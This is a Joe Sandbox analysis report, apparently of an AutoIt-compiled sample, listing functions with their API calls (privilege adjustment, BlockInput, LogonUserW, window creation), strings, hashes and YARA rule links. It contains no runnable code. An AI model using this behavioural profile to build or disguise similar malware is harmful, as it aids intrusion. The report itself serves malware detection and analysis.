Opcode ID: 2b19741345a61a8b3880c4ec4b9f2158d1ddd9d149deb2903bcb42070fa367b5
Instruction ID: 5ebb7f0b46221dd310222c2822c513077dc09ee0a880e62afde986d3a5571bd6
Opcode Fuzzy Hash: 2b19741345a61a8b3880c4ec4b9f2158d1ddd9d149deb2903bcb42070fa367b5
Instruction Fuzzy Hash: C7F06D75A1130CBFDF04DFF0DC89ABEBBBCEF08201F1044A9A901E2281E7746A148B60

Function 00D0E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5944b49e11b017e3c3ba45910da272596bc0683b0308a89cd3174b7d12b4145
Instruction ID: 2f73f9090be845b29937e0accd6536593bc1e26b6cfbebd24a09c1812d04bb50
Opcode Fuzzy Hash: c5944b49e11b017e3c3ba45910da272596bc0683b0308a89cd3174b7d12b4145
Instruction Fuzzy Hash: AD229074A00215DFDB24DF58C485BAEBBB0FF14300F188969E89A9B391D774E985CBB1

Function 00D6C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00D6C966
FindClose.KERNEL32(00000000), ref: 00D6C996

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: eed458565aace6ea30995121db3d54fe402b66cb7b72147fe9cd2a9fc8233605
Instruction ID: 6a8564acb331ebdf6c9d867e1cf352195124f5a653957dfa6f64ff4f54b5b483
Opcode Fuzzy Hash: eed458565aace6ea30995121db3d54fe402b66cb7b72147fe9cd2a9fc8233605
Instruction Fuzzy Hash: 7B115E726106009FDB10EF29D855A2AF7E9EF84325F04851EF8A9D7291DB70AC04CBA1

Function 00D6A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00D7977D,?,00D8FB84,?), ref: 00D6A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00D7977D,?,00D8FB84,?), ref: 00D6A314

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7ba92e7df5a2493449cd6cf312b4127f9dff97d96e88c63c3c5f0a1bb7ddefcf
Instruction ID: f5aec1d6354a869c2a859c82aa1855a96f2b0c1ff525f9cc5ec94a7f17d340cb
Opcode Fuzzy Hash: 7ba92e7df5a2493449cd6cf312b4127f9dff97d96e88c63c3c5f0a1bb7ddefcf
Instruction Fuzzy Hash: 16F0823555432DABDB109FA4CC48FEA776DFF09761F004165F948D6281D6309940CBB1

Function 00D58713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D58851), ref: 00D58728
CloseHandle.KERNEL32(?,?,00D58851), ref: 00D5873A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 815d0549a720cac8b6a853e412e1349d4eda61263d7018b86fb585995f96e3a2
Instruction ID: d2508395393ea766b0bf5698957bf5889d114827b2ab2bfdfb819d546a2d23c0
Opcode Fuzzy Hash: 815d0549a720cac8b6a853e412e1349d4eda61263d7018b86fb585995f96e3a2
Instruction Fuzzy Hash: 87E0B676010650EEEB252B60FD09E777BA9EB14755B248829F896C0470DB62AC90DB30

Function 00D2A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D28F97,?,?,?,00000001), ref: 00D2A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00D2A3A3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0b3a50981ba9167d43e265b388f658af0917a49ba7f07362bb7bc1d934fcfb6c
Instruction ID: 1b3773ceeb35384fd48fe21c7894baa16ff8f6603bbf87ab2db821d41c6d955c
Opcode Fuzzy Hash: 0b3a50981ba9167d43e265b388f658af0917a49ba7f07362bb7bc1d934fcfb6c
Instruction Fuzzy Hash: 12B09231264308ABCA002B91EC09BA83F68EB46AA2F404020F60DC4260CB6254508BA1

Function 00D2F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05c00ec4dbb63dc6042900f6502e5f2c001f692359ef839f3f88f686fbe3d50
Instruction ID: a6bbd8a5c9749c7570e1cb1a3b10eea71e5eb270400982301f120b351016d963
Opcode Fuzzy Hash: a05c00ec4dbb63dc6042900f6502e5f2c001f692359ef839f3f88f686fbe3d50
Instruction Fuzzy Hash: 1F322822D69F114DD7239634E872335A298AFB73D8F15DB37F819F5AA6EB28C4834110

Function 00D3267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f27d4dd17743843eaba73c8bc0190c7904170b34c4c3948be2dd8225960e39f
Instruction ID: 4162fd0a803714766dd2f55e4f3b315e302c2e2a64b97d1e94a23309e8ac1129
Opcode Fuzzy Hash: 9f27d4dd17743843eaba73c8bc0190c7904170b34c4c3948be2dd8225960e39f
Instruction Fuzzy Hash: D1B1F121D2AF514DD72396398831336B78CAFBB6D5F51D71BFC1AB4E22EB2185834181

Function 00D68B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00D68B25

Part of subcall function 00D2543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D691F8,00000000,?,?,?,?,00D693A9,00000000,?), ref: 00D25443
Part of subcall function 00D2543A: __aulldiv.LIBCMT ref: 00D25463

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 6df02c28659b90560464ffcebf7d6a595c69a6178356a05588533b5955d959b2
Instruction ID: bc89a6df0e50761eecbc7786e960e8117b99d76ac40617cd8e14151a15232367
Opcode Fuzzy Hash: 6df02c28659b90560464ffcebf7d6a595c69a6178356a05588533b5955d959b2
Instruction Fuzzy Hash: D221E4726356118FC329CF29D441A52B3E1EBA4311B288F6CE0E5CB2D0CA74B905DFA4

Function 00D741FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00D74218

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 2eac9bbc3b9ed3d24f63d3416dd988c8060d5cc9149b2be10eba24c4cd7ed4e5
Instruction ID: f6b74cbee22514284d6ecb0038af53d01bc2192ea437fd472f4274e9f598e97b
Opcode Fuzzy Hash: 2eac9bbc3b9ed3d24f63d3416dd988c8060d5cc9149b2be10eba24c4cd7ed4e5
Instruction Fuzzy Hash: 06E01A312502149FD710AF69D845A9AF7E8EF947A0F008026F84DC7352EAB0E8408BB5

Function 00D64EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00D64EEC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 0aae88d6c9e2c1bf3bb605272acec3024a34f0f4217eb1e549941c1e3c5a5592
Instruction ID: aaefed2f6137774c4f16c175b27279b7635134e6d317d0b2871d5eecddca5966
Opcode Fuzzy Hash: 0aae88d6c9e2c1bf3bb605272acec3024a34f0f4217eb1e549941c1e3c5a5592
Instruction Fuzzy Hash: C1D09EA91607057BED584B249C5FF771109F301785FD8558AB542C91C3D8D2AC555131

Function 00D58C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D588D1), ref: 00D58CB3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 25cc2d777e849d5dc2c30857b50317c246ea122fd65ef31b894a27a4341dc093
Instruction ID: e85468b7a302e73d4c7cd14090d50baca7e3e7b7a7c43de622b85991fd099b5a
Opcode Fuzzy Hash: 25cc2d777e849d5dc2c30857b50317c246ea122fd65ef31b894a27a4341dc093
Instruction Fuzzy Hash: 68D09E3226460EAFEF019FA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60

Function 00D42230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00D42242

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 8e38a913f30620a3964935f700e3f6405e92242e4b1c5bc2e13e640458024d90
Instruction ID: 321e5de6040dfdc89ec0835427437e65db536b3ddb471b272921bea0e6caba3d
Opcode Fuzzy Hash: 8e38a913f30620a3964935f700e3f6405e92242e4b1c5bc2e13e640458024d90
Instruction Fuzzy Hash: F5C04CF5810109DBDB05DB90D988DEE77BCAB04304F104055A141F2100D7749B448B71

Function 00D2A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00D2A36A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cb75ad7ee9da11a268fb9b3978e793a3cd32550ac5e6d4d9eaa86fae4ff198ff
Instruction ID: 805112f0e5f7b9f8793aab0837f30b482fd0a18f446497c32232c8406b5e81ac
Opcode Fuzzy Hash: cb75ad7ee9da11a268fb9b3978e793a3cd32550ac5e6d4d9eaa86fae4ff198ff
Instruction Fuzzy Hash: 3FA0123001020CA78A001B41EC044547F5CD6011907004020F40CC0121873254104690

Function 00D18A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd94757ad1639b4acdbe01903f3d20d9ee67f87e2bbe813f4563116a0357bad
Instruction ID: 8f0f80824a4acbd111293985d12514e34dbbecd07feea9f7a481587d7ce9e187
Opcode Fuzzy Hash: 5fd94757ad1639b4acdbe01903f3d20d9ee67f87e2bbe813f4563116a0357bad
Instruction Fuzzy Hash: F6222530905656EBDF29CA14F0A46BE77A2EB41311F6C446ADC828B295DF30DDC5EBB0

Function 00D22405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: a6fbaaeb3b0706b2cbba23e9b8d5cbf6993441a3d0bdd9f7efbe624808c99f5c
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 77C17F372090B309DB2D8639A57413EBAE15EB27B531E476DF4B2CB5C4EF20D564A630

Function 00D2283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: ecd98a87a13b2380be0c78d058a03ecbc3f2dd251d1d707d2084fb3228066482
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 81C18E372051B30ADB2D863AA53403EBAE15EB27B531E076DF4B2DB5D4EF20D524A630

Function 00D21BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 85dbaa5df4c7a5c5df06e3956aafe6c3914702de1e7f6c8b899cdd34de8f27e7
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 58C1623B2051B309DF2D863AA53413EBAE15EB27B531E876DE4B2CB5D4EF20D5249630

Function 00D77B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00D77B70
DeleteObject.GDI32(00000000), ref: 00D77B82
DestroyWindow.USER32 ref: 00D77B90
GetDesktopWindow.USER32 ref: 00D77BAA
GetWindowRect.USER32(00000000), ref: 00D77BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00D77CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00D77D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77D4A
GetClientRect.USER32(00000000,?), ref: 00D77D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D77D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77DF8
GlobalFree.KERNEL32(00000000), ref: 00D77E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D92CAC,00000000), ref: 00D77E2B
GlobalFree.KERNEL32(00000000), ref: 00D77E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00D77E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00D77E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D77EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D7808F

Strings

, xrefs: 00D78015
AutoIt v3, xrefs: 00D77D42
DISPLAY, xrefs: 00D77EF2
static, xrefs: 00D77D8A, 00D77EE1

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 84070f7cc5a657cee341610109374ba9f1793afebc540d5f7f4086c905533692
Instruction ID: 4c943b6d4af3de0f891d1b125ab5b0e7195df1bc83b359b81aec92f3bd4b761e
Opcode Fuzzy Hash: 84070f7cc5a657cee341610109374ba9f1793afebc540d5f7f4086c905533692
Instruction Fuzzy Hash: A9026B71910215AFDB14DFA8DC89EAEBBB9EF48310F148558F909EB2A1DB709D01CB70

Function 00D837F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00D8F910), ref: 00D838AF
IsWindowVisible.USER32(?), ref: 00D838D3

Strings

TABRIGHT, xrefs: 00D83925
ISENABLED, xrefs: 00D838F3
TABLEFT, xrefs: 00D8390F
GETCURRENTLINE, xrefs: 00D83B75
SELECTSTRING, xrefs: 00D83A8E
CURRENTTAB, xrefs: 00D83945
GETCURRENTCOL, xrefs: 00D83BB0
DELSTRING, xrefs: 00D839D1
SHOWDROPDOWN, xrefs: 00D83968
SENDCOMMANDID, xrefs: 00D83C62
